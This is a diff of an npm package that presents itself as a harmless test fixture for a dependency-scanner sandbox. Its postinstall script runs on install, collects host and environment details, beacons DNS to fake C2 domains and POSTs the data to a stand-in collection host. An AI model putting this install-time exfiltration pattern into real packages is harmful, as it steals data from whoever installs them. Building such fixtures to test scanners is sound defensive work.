df-sandbox-test 1.0.0
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +35 -0
- package/index.js +3 -0
- package/package.json +11 -0
- package/postinstall.js +67 -0
package/README.md
ADDED
|
@@ -0,0 +1,35 @@
|
|
|
1
|
+
# df-sandbox-test
|
|
2
|
+
|
|
3
|
+
**Security test fixture for the [Dependency Firewall](https://github.com/ihcap/df) sandbox scanner.**
|
|
4
|
+
|
|
5
|
+
This package simulates the behaviour of a malicious npm package that exfiltrates environment data during `npm install`. It is completely harmless — the domains it tries to reach are not registered and no data leaves the machine — but it produces DNS queries that the Dependency Firewall sandbox scanner is designed to detect.
|
|
6
|
+
|
|
7
|
+
## What it does during `postinstall`
|
|
8
|
+
|
|
9
|
+
| Action | Domain / endpoint | Expected outcome |
|
|
10
|
+
|---|---|---|
|
|
11
|
+
| DNS lookup (C2 beacon) | `c2-beacon.df-sandbox-test.io` | NXDOMAIN |
|
|
12
|
+
| DNS lookup (exfil fallback) | `exfil.df-sandbox-test.io` | NXDOMAIN |
|
|
13
|
+
| HTTPS POST (data exfil) | `collect.df-sandbox-test.io:443/beacon` | Connection refused / NXDOMAIN |
|
|
14
|
+
|
|
15
|
+
## Expected Dependency Firewall finding
|
|
16
|
+
|
|
17
|
+
```json
|
|
18
|
+
{
|
|
19
|
+
"scanner_id": "sandbox",
|
|
20
|
+
"severity": "high",
|
|
21
|
+
"category": "sandbox-network",
|
|
22
|
+
"description": "df-sandbox-test@1.0.0 attempted outbound DNS resolution: c2-beacon.df-sandbox-test.io, exfil.df-sandbox-test.io, collect.df-sandbox-test.io"
|
|
23
|
+
}
|
|
24
|
+
```
|
|
25
|
+
|
|
26
|
+
## Usage
|
|
27
|
+
|
|
28
|
+
```bash
|
|
29
|
+
# Publish (once) to npm under your own account
|
|
30
|
+
npm publish
|
|
31
|
+
|
|
32
|
+
# Install through the Dependency Firewall proxy
|
|
33
|
+
cd /your/test-project
|
|
34
|
+
npm install --registry http://localhost:4873 df-sandbox-test
|
|
35
|
+
```
|
package/index.js
ADDED
package/package.json
ADDED
|
@@ -0,0 +1,11 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "df-sandbox-test",
|
|
3
|
+
"version": "1.0.0",
|
|
4
|
+
"description": "Security test fixture for the Dependency Firewall sandbox scanner. Simulates malicious postinstall behaviour without doing any actual harm.",
|
|
5
|
+
"keywords": ["security", "test", "sandbox"],
|
|
6
|
+
"license": "MIT",
|
|
7
|
+
"main": "index.js",
|
|
8
|
+
"scripts": {
|
|
9
|
+
"postinstall": "node postinstall.js"
|
|
10
|
+
}
|
|
11
|
+
}
|
package/postinstall.js
ADDED
|
@@ -0,0 +1,67 @@
|
|
|
1
|
+
/**
|
|
2
|
+
* df-sandbox-test — postinstall.js
|
|
3
|
+
*
|
|
4
|
+
* This is a SECURITY TEST FIXTURE for the Dependency Firewall sandbox scanner.
|
|
5
|
+
* It simulates three classic malicious-postinstall patterns:
|
|
6
|
+
*
|
|
7
|
+
* 1. DNS exfiltration beacon — looks up a fake C2 hostname.
|
|
8
|
+
* 2. HTTPS data exfiltration — attempts an outbound HTTPS connection.
|
|
9
|
+
* 3. Environment collection — gathers host info (logged locally only).
|
|
10
|
+
*
|
|
11
|
+
* None of these domains are registered. No data leaves the machine; in a
|
|
12
|
+
* properly sandboxed environment all connection attempts are blocked. The goal
|
|
13
|
+
* is to produce DNS queries that the Dependency Firewall sandbox scanner can
|
|
14
|
+
* detect and report.
|
|
15
|
+
*/
|
|
16
|
+
|
|
17
|
+
'use strict';
|
|
18
|
+
|
|
19
|
+
const dns = require('dns');
|
|
20
|
+
const https = require('https');
|
|
21
|
+
const os = require('os');
|
|
22
|
+
|
|
23
|
+
// ── 1. Collect environment info (mirrors what real malware does) ─────────────
|
|
24
|
+
const payload = JSON.stringify({
|
|
25
|
+
host: os.hostname(),
|
|
26
|
+
platform: os.platform(),
|
|
27
|
+
arch: os.arch(),
|
|
28
|
+
cwd: process.cwd(),
|
|
29
|
+
node: process.version,
|
|
30
|
+
env: {
|
|
31
|
+
PATH: process.env.PATH,
|
|
32
|
+
HOME: process.env.HOME,
|
|
33
|
+
USER: process.env.USER,
|
|
34
|
+
CI: process.env.CI,
|
|
35
|
+
},
|
|
36
|
+
});
|
|
37
|
+
|
|
38
|
+
// ── 2. DNS beacon — resolving a fake C2 domain triggers a DNS query ──────────
|
|
39
|
+
// Even with NXDOMAIN the OS must send a UDP packet to the nameserver first.
|
|
40
|
+
dns.lookup('c2-beacon.df-sandbox-test.io', (err) => {
|
|
41
|
+
if (err) process.stderr.write(`dns beacon: ${err.code}\n`);
|
|
42
|
+
});
|
|
43
|
+
|
|
44
|
+
// A second domain simulating a fallback C2.
|
|
45
|
+
dns.lookup('exfil.df-sandbox-test.io', (err) => {
|
|
46
|
+
if (err) process.stderr.write(`dns exfil: ${err.code}\n`);
|
|
47
|
+
});
|
|
48
|
+
|
|
49
|
+
// ── 3. HTTPS exfiltration attempt ────────────────────────────────────────────
|
|
50
|
+
// Real supply-chain malware (e.g. ua-parser-js, event-source-polyfill) POSTs
|
|
51
|
+
// environment data to an attacker-controlled server during install.
|
|
52
|
+
const req = https.request(
|
|
53
|
+
{
|
|
54
|
+
hostname: 'collect.df-sandbox-test.io',
|
|
55
|
+
port: 443,
|
|
56
|
+
path: '/beacon',
|
|
57
|
+
method: 'POST',
|
|
58
|
+
headers: { 'Content-Type': 'application/json', 'Content-Length': Buffer.byteLength(payload) },
|
|
59
|
+
timeout: 3000,
|
|
60
|
+
},
|
|
61
|
+
(res) => process.stdout.write(`exfil: connected (status ${res.statusCode})\n`),
|
|
62
|
+
);
|
|
63
|
+
|
|
64
|
+
req.on('timeout', () => { req.destroy(); process.stderr.write('exfil: timed out\n'); });
|
|
65
|
+
req.on('error', (err) => process.stderr.write(`exfil: ${err.code}\n`));
|
|
66
|
+
req.write(payload);
|
|
67
|
+
req.end();
|